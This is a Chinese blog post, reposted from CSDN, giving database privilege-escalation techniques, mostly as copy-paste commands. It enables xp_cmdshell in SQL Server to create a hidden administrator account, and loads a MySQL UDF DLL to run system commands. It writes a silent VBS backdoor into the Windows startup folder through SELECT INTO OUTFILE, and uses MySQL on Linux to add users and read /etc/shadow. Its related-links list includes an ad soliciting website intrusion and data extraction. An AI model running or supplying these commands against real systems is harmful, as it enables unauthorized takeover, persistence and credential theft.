滲透之——資料庫提權
轉載請註明出處:https://blog.csdn.net/l1028386804/article/details/85768994
一、SQL Server提權
1.啟用或關閉xp_cmdshell
--啟用xp_cmdshell
USE master
EXEC sp_configure 'show advanced options', 1
RECONFIGURE WITH OVERRIDE
EXEC sp_configure 'xp_cmdshell', 1
RECONFIGURE WITH OVERRIDE
EXEC sp_configure 'show advanced options', 0
RECONFIGURE WITH OVERRIDE
--關閉xp_cmdshell
USE master
EXEC sp_configure 'show advanced options', 1
RECONFIGURE WITH OVERRIDE
EXEC sp_configure 'xp_cmdshell', 0
RECONFIGURE WITH OVERRIDE
EXEC sp_configure 'show advanced options', 0
RECONFIGURE WITH OVERRIDE
2.新增使用者
Exec master.dbo.xp_cmdshell 'net user liuyazhuang lyz123 /add'
3.將使用者新增到管理員組
Exec master.dbo.xp_cmdshell 'net localgroup administrators liuyazhuang /add'
4.通過xp_cmdshell exec檢視系統使用者
Exec master.dbo.xp_cmdshell 'net user'
5.遠端終端登入
命令列執行mstsc開啟遠端終端,輸入IP地址和剛才新增的使用者名稱和密碼,登入即可。
另外,通過資料庫備份,將批處理命令備份到啟動資料夾下,系統重啟後就會自動執行批處理命令,也能達到提權的效果。
二、MySQL提權
1.將udf.dll檔案匯出到預設的外掛目錄下
2.UDF提權的常用命令
create function cmdshell returns string soname 'udf.dll';
select cmdshell('net user liuyazhuang lyz123 /add');
select cmdshell('net localgroup administrators liuyazhuang /add');
select cmdshell('net localgroup administrators');
select cmdshell('ipconfig/all');
select cmdshell('net user');
select cmdshell('regedit /s d:\wwwroot\3389.reg');
drop function cmdshell;
select cmdshell('netstat -an');
3.VBS啟動項
先通過WebShell連線資料庫,通過建立表a將VBS指令碼寫入表中,然後匯入啟動項。該指令碼僅對中文版有效,如果使用其他語言版本的作業系統,僅需對"C:\\Documents and Settings\\All Users\\[開始]選單\\程式\\啟動\\a.vbs"這個指令碼進行相應更改。在VBS指令碼後面有一個"0",表示不彈出CMD視窗,以靜默模式執行。該方法是在通過UDF提權失敗的情況下,將VBS插入啟動項中,待系統重啟後將自動新增一個使用者,示例如下:
create table a (cmd text);
insert into a values("set wshshell=createobject(""wscript.shell"") " );
insert into a values("a=wshshell.run(""cmd.exe /c net user liuyazhuang lyz123 /add"",0) " );
insert into a values("b=wshshell.run(""cmd.exe /c net localgroup administrators liuyazhuang /add"",0) " );
select * from a into outfile "C:\\Documents and Settings\\All Users\\[開始]選單\\程式\\啟動\\a.vbs";
三、Linux下的MySQL提權
mysql -hlocalhost -uroot -p
system useradd hacker
system passwd hacker
system tail -l /etc/passwd
system tail -l /etc/shadow
相關文章
- 內網滲透之——mssql資料庫提權之——xp_cmdshell執行系統命令內網SQL資料庫
- 【人在】尋高手滲透/網站入侵提權,資料庫提取資料Q!10125.08669網站資料庫
- 滲透測試——提權方式總結
- Mysql滲透及提權,命令執行MySql
- 12、強大的內網域滲透提權分析工具——BloodHound內網
- Metasploit之後滲透攻擊(資訊收集、許可權提升)
- MySQL資料庫Root許可權MOF方法提權研究MySql資料庫
- 開源滲透測試工具--關於資料庫資料庫
- 滲透測試之資訊收集
- 【Vulnhub靶機滲透測試】之DC-4(teehee命令提權(在passwd或crontab中追加內容))
- 7.22-27MY&MS&ORA等SQL資料庫提權SQL資料庫
- 滲透測試之nmap
- 網安之-=滲透思路
- 滲透測試-許可權維持
- 常見的授權滲透環境
- 域滲透之ldap協議LDA協議
- 滲透測試之域名收集
- 記一次授權滲透測試
- 內網滲透-初探域滲透內網
- 從哲學角度看滲透之關於滲透與高智商電影
- 滲透&&探測 (之DNS協議)DNS協議
- 域滲透的金之鑰匙
- 安全技術 | 域滲透之SPN
- mysql提權之mof詳解MySql
- python滲透測試入門——Scapy庫Python
- Linux提權————利用SUID提權LinuxUI
- 滲透測試模擬黑客攻擊之蒐集資訊黑客
- 滲透測試-資訊收集
- 滲透測試------資訊收集
- powershell滲透-資訊收集命令
- 滲透測試——資訊收集
- [資料庫]MYSQL之授予/查驗binlog許可權資料庫MySql
- wifi滲透WiFi
- 透過等待看資料庫資料庫
- Linux利用UDF庫實現Mysql提權LinuxMySql
- 域滲透之利用WMI來橫向滲透
- Windows提權實戰——————3、PcAnyWhere提權WindowsPCA
- 權威認可!OceanBase 透過分散式資料庫金融標準驗證分散式資料庫